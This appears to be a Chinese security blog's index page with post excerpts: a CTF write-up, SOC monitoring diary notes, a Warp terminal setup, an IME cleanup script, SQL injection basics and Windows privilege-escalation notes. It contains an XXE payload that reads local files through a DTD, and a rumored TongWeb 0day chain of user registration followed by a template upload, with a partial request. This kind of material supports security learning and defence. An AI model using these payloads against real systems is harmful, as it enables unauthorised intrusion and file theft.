lan1ocのblog

前言残缺的队伍配上不好打的比赛😥 webweb-1直接看源码 1view-source:http://139.224.232.213:30333/ 1flag{2cfde35c1735cb1abfa071e7c982659907ffd9cd} 12奇葩的环境，一开始一直拒绝连接，开都开不起来，又是抢不到血的一场比赛😅 web-2看网页源码易知是xxe漏洞然后经过尝试，报错得到flag 1234567891011121314<?xml version="1.0" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % expr 'aaa)> <!ENTITY &#x25; file SYSTEM "file:///flag"> ...

发现一个攻击ip了告警一直在进行扫描微步查了近期攻击行为也较多唉通知客户了，可是还没封，我这就管个态势，我封他也没用啊。。。。 无结果啥都没发现啊其他的一点连不上 同事讨论原来不止我一人这样啊，我是第四天才看到扫描类的告警，有的同事基本都没看到过求干奥，真的求干奥，能不能卖力点 ps：有攻击队被同事溯源了，真的难绷 排名倒一不对劲啊，我这今天才看到明确攻击行为的告警，怎么我们市倒一，额。。。。应该不是我的责任吧。。。。。真没啥告警啊 不敢求干了，怎么倒一了，真的啥也没看到啊，可疑的也摇人分析了，唉 之前遇到的奇怪的错误堆栈信息的包终于看到一个比较完整的了 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576--fe7bae61-bea2-4b14-84e7-e73981c5fd4c Content-Disposition: form-data;...

又都是误报，相关群里说了开放政务网攻击，但是总结的攻击ip还是一条都没发现嗯，依旧风平浪静 奇怪的误报包跟同事讨论后觉得应该是正常业务包，告警类型是但是传了个二进制数据，匹配到了or关键字但是服务端什么回显都没有请求的路径是不是很看得懂，ai分析是说推测为Trend Micro OfficeScan的文件上传接口搞不懂，应该不是攻击，反正也通报客户注意了

风平浪静SIP的告警显示好怪啊，设置自动刷新了，有时候没刷新，然后有时候我刷新了没反应，后面刷出来了，发现是几分钟前了，但那个时候我都刷过了。。。。。。 奇怪的包昨天就注意到了，一个可能是上传文件的包？毕竟服务端回显上传文件成功，也给了路径但我看请求体全是错误堆栈信息，好像还是手机传的，告警显示如下我觉得应该是误报，匹配到了这个关键字标红的信息除了有个资产ip，其他也没啥都是错误堆栈信息，问了同事，讨论后决定应该是误报，再观察吧

用的是深信服的态势感知SIP误报误报很多，明确的攻击行为没怎么检测到不要自己吓自己，多查 疑似攻击事件态感的告警类型的是通用系统代码注入源ip和代理ip查了下微步全红，然后看日志，没怎么分析出，感觉就像是一个员工通过vpn远程访问内网的操作，但是最后的数据包，服务端回显了一个jwt认证值，解不出来，没有密钥，和同事讨论了下，说可能是攻击主要是客户那边一直不回啊，不知道是正常业务还是啥，不敢直接封禁 终于是回复了，最后是讨论了之后，由他那边让防火墙直接封禁这个ip

昨晚爆0day了今早同事发了个存疑的包，只能参考，zip包还不知道是否要特殊构造 1234567据小道消息tongweb有这么个洞/thirdParty/bind任意用户注册，包发过去，会返回accesstoken（JSESSIONID），拿token打上传{"username":"userxxxx","loginway": 1, "loginType": "xxx", "thirdId": "abcdefg”}上传接口/cmsmanager/template/import 12345678910111213141516171819202122232425262728POST /cmsmanager/template/import?isCover=1 HTTP/1.1Host: Connection: keep-aliveContent-Length: 203Cache-Control: max-age=0sec-ch-ua:...

warp一款牛逼的带ai的终端，但目前感觉也不算太牛逼，可能没找对用法，毕竟tabby用习惯了 ssh免密并自动warpifyssh免密这个不用说了，直接启动ai帮你搞就行了，free版每天有150次对话机会自动warpify就在第一次ssh连接时，运行 12echo -e '\n# Auto-Warpify for Warp\nif [[ "$-" == *i* ]]; then\n printf '\''\eP$f{"hook":"SourcedRcFileForWarp","value":{"shell":"bash","uname":"'"$(uname)"'"}}\x9c'\''\nfi\n' >> ~/.bashrc 1source...

问题情景每次打开新应用或者切应用要输入时，输入法就卡住，半天才能显示出来 分析临时文件过多 解决：清理 TMP 临时文件1cd "$env:AppData\Microsoft\InputMethod\Chs" 临时文件一眼望不到头啊，直接删 1Remove-Item -Path '*.tmp' -Force 关删除都删了一分半多，并且随时就能产生一堆临时文件啊还是要定期清理啊，写个计划任务吧先写个清理脚本1.ps1 12# Delete all .tmp files under IME cache pathRemove-Item -Path "$env:AppData\Microsoft\InputMethod\Chs\*.tmp" -Recurse -Force -ErrorAction SilentlyContinue win+r->taskschd.msc就启动的时候清理一次算了然后填刚刚写的那个脚本 1-ExecutionPolicy Bypass -WindowStyle Hidden -File...

数据请求类型大致就是以下四种1、数字型(无符号干扰) 1select * from news where id=$id; 2、字符型（有符号干扰） 1select * from news where id='$id'; 3、搜索型（有多符号干扰） 1select * from news where id like '%$id%' 4、框架型（有各种符号干扰） 12select * from news where id=('$id');select * from news where (id='$id'); 请求方式通过功能点来判断注入点，请求方式有以下几种全局变量方法：GET POST SERVER FILES HTTP 头等User-Agent： 使得服务器能够识别客户使用的操作系统，游览器版本等.（很多数据量大的网站中会记 录客户使用的操作系统或浏览器版本等存入数据库中） Cookie： 网站为了辨别用户身份、进行 session...

基本知识点Administrators组可以更改系统配置SYSTEM / LocalSystem 帐户比管理员用户具有更多的权限Local Service用于以“最低”权限运行 Windows 服务的默认帐户。它将通过网络使用匿名连接Network Service用于以“最低”权限运行 Windows 服务的默认帐户。它将使用计算机凭据通过网络进行身份验证 收集密码的常用位置无人值守的 Windows 安装在大量主机上安装 Windows 时，管理员可以使用 Windows...